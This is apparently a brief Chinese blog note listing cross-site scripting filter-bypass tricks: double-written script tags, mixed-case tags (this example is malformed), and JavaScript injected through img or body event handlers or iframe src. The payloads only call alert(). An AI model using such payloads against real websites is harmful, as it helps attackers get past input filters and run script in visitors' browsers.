1、双写绕过 <scr<script>ipt>alert(/xss/)</script>
2、大小写混淆 <sCRipt>alert</xss></script>
3、通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。

Last modification:January 6th, 2020 at 10:33 am
If you think my article is useful to you, please feel free to appreciate